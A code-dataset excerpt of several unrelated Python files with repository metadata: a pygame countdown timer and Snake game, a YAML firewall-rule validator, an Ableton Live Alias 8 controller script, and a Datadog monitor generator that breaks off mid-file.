cec52e737fbc12c84d80316828bc07b3c2d217d2 | 354 | py | Python | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | null | null | null | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | null | null | null | timer.py | edif/Countdown-timer | 625d62f3dabec93b52c5a9f7012177289fd9f067 | [
"MIT"
] | 1 | 2021-05-20T04:25:42.000Z | 2021-05-20T04:25:42.000Z | import time
import pygame
pygame.mixer.init()
alarm = pygame.mixer.Sound("alarm_ding.ogg")
alarm_len = alarm.get_length()
minutes = int(input ("Minutes:"))*60
seconds = int(input("Seconds:"))
timer = minutes + seconds
for i in range(timer):
print("", str(timer - i), end="\r")
time.sleep(1)
alarm.play()
print("time's over")
time.sleep(alarm_len) | 25.285714 | 44 | 0.69209 | import time
import pygame
pygame.mixer.init()
alarm = pygame.mixer.Sound("alarm_ding.ogg")
alarm_len = alarm.get_length()
minutes = int(input ("Minutes:"))*60
seconds = int(input("Seconds:"))
timer = minutes + seconds
for i in range(timer):
print("", str(timer - i), end="\r")
time.sleep(1)
alarm.play()
print("time's over")
time.sleep(alarm_len) | 0 | 0 | 0 |
be7462abf626e2b079537e2f1c3b0b33acf2580d | 2,886 | py | Python | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | Old PyGame stuff/snake/snake.py | Narcolapser/PyGameLearningByDoing | 460da31b190b2f4d44bb2914215efc04e3fc1c8f | [
"Apache-2.0"
] | null | null | null | #################################3##################################################################
# Name: Pygame Snake Experiement
# Purpose: Make a simple pygame game to get a handle on PyGame
# Date: 2013/12/22
# Programmer: Toben "Littlefoo" "Narcolapser" Archer
# Version: 0.1
####################################################################################################
import sys, pygame
from pygame.locals import *
from random import randint
import math
pygame.init()
fps = pygame.time.Clock()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption('SNAAAAAAAAAAAAAAAAAAAAAAKE!!!!!!!!!!!!!!')
snakeLength = 3
snakeBody = [(320,240),(320,250),(320,260)]
apple = newApple()
speed = 10
direction = (0,-1)
#(1, = left, (-1, = right, 1) = down, -1) = up
quit = False
while not quit:
events = pygame.event.get()
window.fill((0,0,128))
for event in events:
if event.type == KEYDOWN:
if event.key == K_q:
quit = True
if event.key == K_a:
direction = (-1,0)
if event.key == K_d:
direction = (1,0)
if event.key == K_w:
direction = (0,-1)
if event.key == K_s:
direction = (0,1)
appleEaten = snakeCollidesApple(snakeBody,apple)
snakeBitten = snakeCollidesSelf(snakeBody)
snakeCrashed = snakeCollidesEdge(snakeBody)
if appleEaten:
apple = newApple()
snakeLength += 1
speed += 1
snakeBody = moveSnake(snakeBody)
drawApple()
drawSnake()
pygame.display.update()
fps.tick(speed)
quit = snakeBitten or snakeCrashed or quit
print "you ate:",snakeLength-3,"apples!"
if randint(0,100)>95:
print "big question here: do snakes eat apples?"
| 23.088 | 100 | 0.618503 | #################################3##################################################################
# Name: Pygame Snake Experiement
# Purpose: Make a simple pygame game to get a handle on PyGame
# Date: 2013/12/22
# Programmer: Toben "Littlefoo" "Narcolapser" Archer
# Version: 0.1
####################################################################################################
import sys, pygame
from pygame.locals import *
from random import randint
import math
def drawApple():
red = pygame.Color(255,0,0)
green = pygame.Color(0,255,0)
pygame.draw.circle(window,red,apple,5,0)
def newApple():
x = randint(5,635)
y = randint(5,475)
while abs(snakeBody[0][0]-x)<20:
x = randint(1,63)
x *= 10
x += 5
while abs(snakeBody[0][1]-y)<20:
y = randint(1,47)
y *= 10
y += 5
return (x,y)
def drawSnake():
green = pygame.Color(0,255,0)
for section in snakeBody:
pygame.draw.circle(window,green,section,5,0)
def moveSnake(snakeBody):
head = snakeBody[0]
new = (head[0]+10*direction[0],head[1]+10*direction[1])
snakeBody = [new] + snakeBody
while len(snakeBody) > snakeLength:
snakeBody.pop()
return snakeBody
def snakeCollidesApple(snakeBody,apple):
collide = False
for s in snakeBody:
x = s[0] - apple[0]
y = s[1] - apple[1]
if abs(x)<=7 and abs(y)<=7:
collide = True
break
return collide
def snakeCollidesSelf(snakeBody):
collide = False
head = snakeBody[0]
for s in snakeBody[1:]:
x = s[0] - head[0]
y = s[1] - head[1]
if (x*x + y*y) < 25:
collide = True
break
return collide
def snakeCollidesEdge(snakeBody):
head = snakeBody[0]
if head[0] < 0: return True
if head[0] > 640: return True
if head[1] < 0: return True
if head[1] > 480: return True
return False
pygame.init()
fps = pygame.time.Clock()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption('SNAAAAAAAAAAAAAAAAAAAAAAKE!!!!!!!!!!!!!!')
snakeLength = 3
snakeBody = [(320,240),(320,250),(320,260)]
apple = newApple()
speed = 10
direction = (0,-1)
#(1, = left, (-1, = right, 1) = down, -1) = up
quit = False
while not quit:
events = pygame.event.get()
window.fill((0,0,128))
for event in events:
if event.type == KEYDOWN:
if event.key == K_q:
quit = True
if event.key == K_a:
direction = (-1,0)
if event.key == K_d:
direction = (1,0)
if event.key == K_w:
direction = (0,-1)
if event.key == K_s:
direction = (0,1)
appleEaten = snakeCollidesApple(snakeBody,apple)
snakeBitten = snakeCollidesSelf(snakeBody)
snakeCrashed = snakeCollidesEdge(snakeBody)
if appleEaten:
apple = newApple()
snakeLength += 1
speed += 1
snakeBody = moveSnake(snakeBody)
drawApple()
drawSnake()
pygame.display.update()
fps.tick(speed)
quit = snakeBitten or snakeCrashed or quit
print "you ate:",snakeLength-3,"apples!"
if randint(0,100)>95:
print "big question here: do snakes eat apples?"
| 1,101 | 0 | 161 |
0daa40e3ec7edb96b0896e8da663755d0a55eed0 | 7,692 | py | Python | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 84 | 2022-01-12T21:25:12.000Z | 2022-03-31T05:40:02.000Z | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 77 | 2022-01-12T18:49:05.000Z | 2022-03-29T13:05:17.000Z | examples/networking/decentralized-firewall/validator/validator.py | Kiranug/cloud-foundation-fabric | c4b2f85a3b197a6386081431d8e00d69f4b1ccfb | [
"Apache-2.0"
] | 55 | 2022-01-15T13:47:30.000Z | 2022-03-31T17:35:48.000Z | #!/usr/bin/env python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import ipaddress
import json
import sys
import click
import yaml
import yamale
from fnmatch import fnmatch
from types import SimpleNamespace
from yamale.validators import DefaultValidators, Validator
class Netmask(Validator):
""" Custom netmask validator """
tag = 'netmask'
settings = {}
mode = None
_type = None
class NetworkTag(Validator):
""" Custom network tag validator """
tag = 'networktag'
settings = {}
mode = None
_type = None
class ServiceAccount(Validator):
""" Custom service account validator """
tag = 'serviceaccount'
settings = {}
mode = None
_type = None
class NetworkPorts(Validator):
""" Custom ports validator """
tag = 'networkports'
settings = {}
mode = None
_type = None
allowed_port_map = []
approved_port_map = []
@click.command()
@click.argument('files')
@click.option('--schema',
default='/schemas/firewallSchema.yaml',
help='YAML schema file')
@click.option('--settings',
default='/schemas/firewallSchemaSettings.yaml',
help='schema configuration file')
@click.option('--mode',
default='validate',
help='select mode (validate or approve)')
@click.option('--github',
is_flag=True,
default=False,
help='output GitHub action compatible variables')
if __name__ == '__main__':
main()
| 29.247148 | 77 | 0.656526 | #!/usr/bin/env python3
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import ipaddress
import json
import sys
import click
import yaml
import yamale
from fnmatch import fnmatch
from types import SimpleNamespace
from yamale.validators import DefaultValidators, Validator
class Netmask(Validator):
""" Custom netmask validator """
tag = 'netmask'
settings = {}
mode = None
_type = None
def __init__(self, *args, **kwargs):
self._type = kwargs.pop('type', 'source-or-dest')
super().__init__(*args, **kwargs)
def fail(self, value):
dir_str = 'source or destination'
mode_str = 'allowed'
if self._type == 'source':
dir_str = 'source'
elif self._type == 'destination':
dir_str = 'destination'
if self.mode == 'approve':
mode_str = 'automatically approved'
return '\'%s\' is not an %s %s network.' % (value, mode_str, dir_str)
def _is_valid(self, value):
is_ok = False
network = ipaddress.ip_network(value)
if self._type == 'source' or self._type == 'source-or-dest':
for ip_range in self.settings['allowedSourceRanges']:
allowed_network = ipaddress.ip_network(ip_range['cidr'])
if network.subnet_of(allowed_network):
if self.mode != 'approve' or ip_range['approved']:
is_ok = True
break
if self._type == 'destination' or self._type == 'source-or-dest':
for ip_range in self.settings['allowedDestinationRanges']:
allowed_network = ipaddress.ip_network(ip_range['cidr'])
if network.subnet_of(allowed_network):
if self.mode != 'approve' or ip_range['approved']:
is_ok = True
break
return is_ok
class NetworkTag(Validator):
""" Custom network tag validator """
tag = 'networktag'
settings = {}
mode = None
_type = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def fail(self, value):
mode_str = 'allowed'
if self.mode == 'approve':
mode_str = 'automatically approved'
return '\'%s\' is not an %s network tag.' % (value, mode_str)
def _is_valid(self, value):
is_ok = False
for tag in self.settings['allowedNetworkTags']:
if fnmatch(value, tag['tag']):
if self.mode != 'approve' or tag['approved']:
is_ok = True
break
return is_ok
class ServiceAccount(Validator):
""" Custom service account validator """
tag = 'serviceaccount'
settings = {}
mode = None
_type = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def fail(self, value):
mode_str = 'allowed'
if self.mode == 'approve':
mode_str = 'automatically approved'
return '\'%s\' is not an %s service account.' % (value, mode_str)
def _is_valid(self, value):
is_ok = False
for sa in self.settings['allowedServiceAccounts']:
if fnmatch(value, sa['serviceAccount']):
if self.mode != 'approve' or sa['approved']:
is_ok = True
break
return is_ok
class NetworkPorts(Validator):
""" Custom ports validator """
tag = 'networkports'
settings = {}
mode = None
_type = None
allowed_port_map = []
approved_port_map = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for port in self.settings['allowedPorts']:
ports = self._process_port_definition(port['ports'])
self.allowed_port_map.extend(ports)
if port['approved']:
self.approved_port_map.extend(ports)
def _process_port_definition(self, port_definition):
ports = []
if not isinstance(port_definition, int) and '-' in port_definition:
start, end = port_definition.split('-', 2)
for port in range(int(start), int(end) + 1):
ports.append(int(port))
else:
ports.append(int(port_definition))
return ports
def fail(self, value):
mode_str = 'allowed'
if self.mode == 'approve':
mode_str = 'automatically approved'
return '\'%s\' is not an %s IP port.' % (value, mode_str)
def _is_valid(self, value):
ports = self._process_port_definition(value)
is_ok = True
for port in ports:
if self.mode == 'approve' and port not in self.approved_port_map:
is_ok = False
break
elif port not in self.allowed_port_map:
is_ok = False
break
return is_ok
class FirewallValidator:
schema = None
settings = None
validators = None
def __init__(self, settings, mode):
self.settings = settings
self.validators = DefaultValidators.copy()
Netmask.settings = self.settings
Netmask.mode = mode
self.validators[Netmask.tag] = Netmask
NetworkTag.settings = self.settings
NetworkTag.mode = mode
self.validators[NetworkTag.tag] = NetworkTag
ServiceAccount.settings = self.settings
ServiceAccount.mode = mode
self.validators[ServiceAccount.tag] = ServiceAccount
NetworkPorts.settings = self.settings
NetworkPorts.mode = mode
self.validators[NetworkPorts.tag] = NetworkPorts
def set_schema_from_file(self, schema):
self.schema = yamale.make_schema(path=schema, validators=self.validators)
def set_schema_from_string(self, schema):
self.schema = yamale.make_schema(
content=schema, validators=self.validators)
def validate_file(self, file):
print('Validating %s...' % (file), file=sys.stderr)
data = yamale.make_data(file)
yamale.validate(self.schema, data)
@click.command()
@click.argument('files')
@click.option('--schema',
default='/schemas/firewallSchema.yaml',
help='YAML schema file')
@click.option('--settings',
default='/schemas/firewallSchemaSettings.yaml',
help='schema configuration file')
@click.option('--mode',
default='validate',
help='select mode (validate or approve)')
@click.option('--github',
is_flag=True,
default=False,
help='output GitHub action compatible variables')
def main(**kwargs):
args = SimpleNamespace(**kwargs)
files = [args.files]
if '*' in args.files:
files = glob.glob(args.files, recursive=True)
print('Arguments: %s' % (str(sys.argv)), file=sys.stderr)
f = open(args.settings)
settings = yaml.load(f, Loader=yaml.SafeLoader)
firewall_validator = FirewallValidator(settings, args.mode)
firewall_validator.set_schema_from_file(args.schema)
output = {'ok': True, 'errors': {}}
for file in files:
try:
firewall_validator.validate_file(file)
except yamale.yamale_error.YamaleError as e:
if file not in output['errors']:
output['errors'][file] = []
output['ok'] = False
for result in e.results:
for err in result.errors:
output['errors'][file].append(err)
if args.github:
print('::set-output name=ok::%s' % ('true' if output['ok'] else 'false'))
print('::set-output name=errors::%s' % (json.dumps(output['errors'])))
print(json.dumps(output), file=sys.stderr)
else:
print(json.dumps(output))
if not output['ok'] and not args.github:
sys.exit(1)
if __name__ == '__main__':
main()
| 5,158 | 157 | 370 |
01cf7eb68c103c544c2212f518a5b1cea3c6bd46 | 10,355 | py | Python | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | 25 | 2015-02-02T21:41:51.000Z | 2022-02-19T13:08:53.000Z | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | null | null | null | Livid_Alias8/Alias.py | thomasf/LiveRemoteScripts | 866330653e1561a140e076c9a7ae64dd486e5692 | [
"MIT"
] | 13 | 2015-10-25T04:44:09.000Z | 2020-03-01T18:02:27.000Z | # amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import DeprecatedSessionZoomingComponent as SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from VCM600.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from VCM600.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.M4LInterfaceComponent import M4LInterfaceComponent
"""Custom files, overrides, and files from other scripts"""
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.Debug import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
""" Here we add an override to the MixerComponent to include return channels in our mixer """
# a | 39.67433 | 182 | 0.764558 | # amounra 0513 : http://www.aumhaa.com
from __future__ import with_statement
import Live
import math
""" _Framework files """
from _Framework.ButtonElement import ButtonElement # Class representing a button a the controller
from _Framework.ButtonMatrixElement import ButtonMatrixElement # Class representing a 2-dimensional set of buttons
from _Framework.ChannelStripComponent import ChannelStripComponent # Class attaching to the mixer of a given track
from _Framework.ClipSlotComponent import ClipSlotComponent # Class representing a ClipSlot within Live
from _Framework.CompoundComponent import CompoundComponent # Base class for classes encompasing other components to form complex components
from _Framework.ControlElement import ControlElement # Base class for all classes representing control elements on a controller
from _Framework.ControlSurface import ControlSurface # Central base class for scripts based on the new Framework
from _Framework.ControlSurfaceComponent import ControlSurfaceComponent # Base class for all classes encapsulating functions in Live
from _Framework.DeviceComponent import DeviceComponent # Class representing a device in Live
from _Framework.EncoderElement import EncoderElement # Class representing a continuous control on the controller
from _Framework.InputControlElement import * # Base class for all classes representing control elements on a controller
from _Framework.MixerComponent import MixerComponent # Class encompassing several channel strips to form a mixer
from _Framework.ModeSelectorComponent import ModeSelectorComponent # Class for switching between modes, handle several functions with few controls
from _Framework.NotifyingControlElement import NotifyingControlElement # Class representing control elements that can send values
from _Framework.SceneComponent import SceneComponent # Class representing a scene in Live
from _Framework.SessionComponent import SessionComponent # Class encompassing several scene to cover a defined section of Live's session
from _Framework.SessionZoomingComponent import DeprecatedSessionZoomingComponent as SessionZoomingComponent # Class using a matrix of buttons to choose blocks of clips in the session
from _Framework.SliderElement import SliderElement # Class representing a slider on the controller
from VCM600.TrackEQComponent import TrackEQComponent # Class representing a track's EQ, it attaches to the last EQ device in the track
from VCM600.TrackFilterComponent import TrackFilterComponent # Class representing a track's filter, attaches to the last filter in the track
from _Framework.TransportComponent import TransportComponent # Class encapsulating all functions in Live's transport section
from _Framework.M4LInterfaceComponent import M4LInterfaceComponent
"""Custom files, overrides, and files from other scripts"""
from _Mono_Framework.MonoButtonElement import MonoButtonElement
from _Mono_Framework.MonoEncoderElement import MonoEncoderElement
from _Mono_Framework.MonoBridgeElement import MonoBridgeElement
from _Mono_Framework.Debug import *
from Map import *
""" Here we define some global variables """
switchxfader = (240, 00, 01, 97, 02, 15, 01, 247)
switchxfaderrgb = (240, 00, 01, 97, 07, 15, 01, 247)
assigncolors = (240, 00, 01, 97, 07, 34, 00, 07, 03, 06, 05, 01, 02, 04, 247)
assign_default_colors = (240, 00, 01, 97, 07, 34, 00, 07, 06, 05, 01, 04, 03, 02, 247)
check_model = (240, 126, 127, 6, 1, 247)
""" Here we add an override to the MixerComponent to include return channels in our mixer """
class AliasMixerComponent(MixerComponent):
def tracks_to_use(self):
return tuple(self.song().visible_tracks) + tuple(self.song().return_tracks)
class Alias(ControlSurface):
__module__ = __name__
__doc__ = " Alias 8 controller script "
def __init__(self, c_instance):
super(Alias, self).__init__(c_instance)
with self.component_guard():
self._host_name = 'Alias'
self._color_type = 'OhmRGB'
self.log_message("--------------= Alias log opened =--------------")
self._rgb = 0
self._timer = 0
self.flash_status = 1
self._clutch_device_selection = False
self._touched = 0
self._update_linked_device_selection = None
self._setup_monobridge()
self._setup_controls()
self._setup_m4l_interface()
self._setup_mixer_control()
self._setup_session_control()
self._setup_mixer_nav()
"""script initialization methods"""
def _setup_monobridge(self):
self._monobridge = MonoBridgeElement(self)
self._monobridge.name = 'MonoBridge'
def _setup_controls(self):
is_momentary = True
self._fader = [MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_FADERS[index], Live.MidiMap.MapMode.absolute, 'Fader_' + str(index), index, self) for index in range(9)]
self._button = [MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, ALIAS_BUTTONS[index], 'Button_' + str(index), self) for index in range(16)]
self._dial = [MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_DIALS[index], Live.MidiMap.MapMode.absolute, 'Dial_' + str(index), index + 8, self) for index in range(16)]
self._encoder = MonoEncoderElement(MIDI_CC_TYPE, CHANNEL, ALIAS_ENCODER, Live.MidiMap.MapMode.absolute, 'Encoder', 0, self)
def _setup_m4l_interface(self):
self._m4l_interface = M4LInterfaceComponent(controls=self.controls, component_guard=self.component_guard)
self.get_control_names = self._m4l_interface.get_control_names
self.get_control = self._m4l_interface.get_control
self.grab_control = self._m4l_interface.grab_control
self.release_control = self._m4l_interface.release_control
def _setup_mixer_control(self):
is_momentary = True
self._num_tracks = (8) #A mixer is one-dimensional;
self._mixer = AliasMixerComponent(8, 0, False, False)
self._mixer.name = 'Mixer'
self._mixer.set_track_offset(0) #Sets start point for mixer strip (offset from left)
for index in range(8):
self._mixer.channel_strip(index).set_volume_control(self._fader[index])
self._mixer.channel_strip(index).set_send_controls(tuple([self._dial[index], self._dial[index+8]]))
self._mixer.channel_strip(index).set_mute_button(self._button[index])
self._button[index].set_on_off_values(MUTE_TOG, 0)
self._mixer.channel_strip(index)._invert_mute_feedback = True
self._mixer.channel_strip(index).set_arm_button(self._button[index+8])
self._button[index+8].set_on_off_values(REC_TOG, 0)
self._mixer.channel_strip(index).name = 'Mixer_ChannelStrip_' + str(index)
self._mixer.master_strip().set_volume_control(self._fader[8])
self.song().view.selected_track = self._mixer.channel_strip(0)._track
def _setup_session_control(self):
self._session = SessionComponent(8, 1)
self._session.set_mixer(self._mixer)
self.set_highlighting_session_component(self._session)
def _setup_mixer_nav(self):
if not self._encoder.value_has_listener(self._nav_change):
self._encoder.add_value_listener(self._nav_change)
"""shift/zoom methods"""
def _nav_change(self, value):
self._session.set_offsets(int((float(value)/float(127))*max(8, len(self._mixer.tracks_to_use())-8)), self._session._scene_offset)
"""called on timer"""
def update_display(self):
ControlSurface.update_display(self)
self._timer = (self._timer + 1) % 256
self.flash()
def flash(self):
if(self.flash_status > 0):
for control in self.controls:
if isinstance(control, MonoButtonElement):
control.flash(self._timer)
"""m4l bridge"""
def generate_strip_string(self, display_string):
NUM_CHARS_PER_DISPLAY_STRIP = 12
if (not display_string):
return (' ' * NUM_CHARS_PER_DISPLAY_STRIP)
if ((len(display_string.strip()) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.endswith('dB') and (display_string.find('.') != -1))):
display_string = display_string[:-2]
if (len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)):
for um in [' ',
'i',
'o',
'u',
'e',
'a']:
while ((len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.rfind(um, 1) != -1)):
um_pos = display_string.rfind(um, 1)
display_string = (display_string[:um_pos] + display_string[(um_pos + 1):])
else:
display_string = display_string.center((NUM_CHARS_PER_DISPLAY_STRIP - 1))
ret = u''
for i in range((NUM_CHARS_PER_DISPLAY_STRIP - 1)):
if ((ord(display_string[i]) > 127) or (ord(display_string[i]) < 0)):
ret += ' '
else:
ret += display_string[i]
ret += ' '
ret = ret.replace(' ', '_')
assert (len(ret) == NUM_CHARS_PER_DISPLAY_STRIP)
return ret
def notification_to_bridge(self, name, value, sender):
if isinstance(sender, MonoEncoderElement):
self._monobridge._send(sender.name, 'lcd_name', str(self.generate_strip_string(name)))
self._monobridge._send(sender.name, 'lcd_value', str(self.generate_strip_string(value)))
def touched(self):
if self._touched is 0:
self._monobridge._send('touch', 'on')
self.schedule_message(2, self.check_touch)
self._touched +=1
def check_touch(self):
if self._touched > 5:
self._touched = 5
elif self._touched > 0:
self._touched -= 1
if self._touched is 0:
self._monobridge._send('touch', 'off')
else:
self.schedule_message(2, self.check_touch)
"""general functionality"""
def allow_updates(self, allow_updates):
for component in self.components:
component.set_allow_update(int(allow_updates!=0))
def disconnect(self):
if self._encoder.value_has_listener(self._nav_change):
self._encoder.remove_value_listener(self._nav_change)
self.log_message("--------------= Alias log closed =--------------")
super(Alias, self).disconnect()
rebuild_sys()
def handle_sysex(self, midi_bytes):
pass
def device_follows_track(self, val):
self._device_selection_follows_track_selection = (val == 1)
return self
def assign_alternate_mappings(self):
pass
def _get_num_tracks(self):
return self.num_tracks
def _on_device_changed(self, device):
#self.log_message('new device ' + str(type(device)))
if self._update_linked_device_selection != None:
self._update_linked_device_selection(device)
def _on_session_offset_changes(self):
if self._r_function_mode._mode_index in range(0,3):
self._mem[int(self._r_function_mode._mode_index)] = self._session2.track_offset()
def connect_script_instances(self, instanciated_scripts):
pass
# a | 5,917 | 829 | 70 |
82b9eabb76e95d06a5105bb51a2e9d0e4f0c6e98 | 8,575 | py | Python | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog-monitor | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | 1 | 2021-05-26T14:56:30.000Z | 2021-05-26T14:56:30.000Z | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | null | null | null | flask_datadog/generator/datadog_monitor.py | abuhabuh/flask-datadog | 8edf4872027fe609638a5aa4decb6125a335ae6d | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Optional
from flask_datadog.generator import endpoint_util
from flask_datadog.shared.datadog_constants import \
MonitorType, \
MonitorSpec
@dataclass(frozen=True)
@dataclass(frozen=True)
class DatadogMonitor:
"""Represents a DataDog Monitor"""
# endpoint_path example: /base_test
endpoint_path: str
# method example: GET
method: str
monitor_type: MonitorType
# mon_spec: dictionary of monitor specifications
mon_spec: dict
DEFAULT_ALERT_PERIOD: str = '5m'
# For anomaly monitors: mapping of rollup intervals for aggregation to the
# avg() time period for the anomaly query
ROLLUP_TO_AVG_TIME_MAP = {
7600: '2w',
3600: '1w',
1800: '1w',
600: '2d',
300: '1d',
120: '12h',
60: '4h',
20: '1h',
}
@property
@property
def name(self) -> str:
"""Return name of DataDog monitor name
TODO: make this function customizable by end user.
"""
cleaned_endpoint_path: str = endpoint_util.clean_endpoint_for_naming(
self.endpoint_path,
)
# Use MonitorType.value because we can keep the enum value the same
# while we we maintain flexibility to refactor the enum name in the code
return f'{self.method.upper()}-{cleaned_endpoint_path}_{self.monitor_type.value}'
@property
def resource_name(self) -> str:
"""Datadog format resource name.
Used for `tags` field in terraform spec for a monitor.
"""
return f'{self.method}_{self.endpoint_path.lower()}'.lower()
@property
def terraform_monitor_type(self) -> str:
"""Map the DataDog Monitor to the proper monitor type for Terraform specs.
Different monitor types: https://docs.datadoghq.com/api/latest/monitors/#create-a-monitor
"""
if self.monitor_type in [
MonitorType.APM_ERROR_RATE_THRESHOLD,
MonitorType.APM_LATENCY_THRESHOLD,
MonitorType.APM_ERROR_RATE_ANOMALY,
]:
return 'query alert'
raise DatadogMonitorFormatException(
f'MonitorType [{self.monitor_type}] has no matching terraform monitor type string')
def get_alert_escalation_msg(self) -> str:
"""Return escalation message
TODO: not sure where escalation msg is applicable
"""
return 'Alert escalated'
def get_alert_msg(self) -> str:
"""Return alert msg for monitor
"""
if self.mon_spec.get(MonitorSpec.MSG, ''):
return ' '.join(self.mon_spec[MonitorSpec.MSG].split())
return f"""{self.monitor_type.value} triggered."""
def get_alert_thresholds(self) -> AlertThresholds:
"""Alert thresholds with defaults
"""
critical_threshold: float = self.mon_spec.get(MonitorSpec.CRITICAL_THRESHOLD, None)
critical_recovery: float = self.mon_spec.get(MonitorSpec.CRITICAL_RECOVERY_THRESHOLD, None)
warning_threshold: float = self.mon_spec.get(MonitorSpec.WARNING_THRESHOLD, None)
warning_recovery: float = self.mon_spec.get(MonitorSpec.WARNING_RECOVERY_THRESHOLD, None)
if all(x is None for x in [
critical_recovery,
critical_threshold,
warning_recovery,
warning_threshold]
):
critical_threshold = .1
critical_recovery = .08
warning_threshold = .05
warning_recovery = .03
return AlertThresholds(
critical_threshold=critical_threshold,
critical_recovery=critical_recovery,
warning_threshold=warning_threshold,
warning_recovery=warning_recovery,
)
def get_anomaly_threshold_windows(self) -> dict[str, str]:
"""Return anomaly monitor threshold windows.
Threshold windows match the alert_window.
"""
if self.is_anomaly_monitor():
return {
'recovery_window': f'last_{self.alert_period}',
'trigger_window': f'last_{self.alert_period}',
}
return {}
def get_query_str(
self,
env: str,
service_name: str,
) -> str:
"""
:param env: alert env (e.g., 'staging', 'prod')
:param service_name: name of service (e.g., 'authentication_service')
"""
at: AlertThresholds = self.get_alert_thresholds()
resource_name: str = f'{self.method.lower()}_{self.endpoint_path}'
# flask_req_filter is the common filter to apply to flask request traces
flask_req_filter: str = f"""
env:{env},
service:{service_name},
resource_name:{resource_name}
"""
if self.monitor_type == MonitorType.APM_ERROR_RATE_THRESHOLD:
query = f"""
sum(last_{self.alert_period}): (
sum:trace.flask.request.errors{{
{flask_req_filter}
}}.as_count()
/
sum:trace.flask.request.hits{{
{flask_req_filter}
}}.as_count()
) > {at.critical_threshold}
"""
elif self.monitor_type == MonitorType.APM_LATENCY_THRESHOLD:
query = f"""
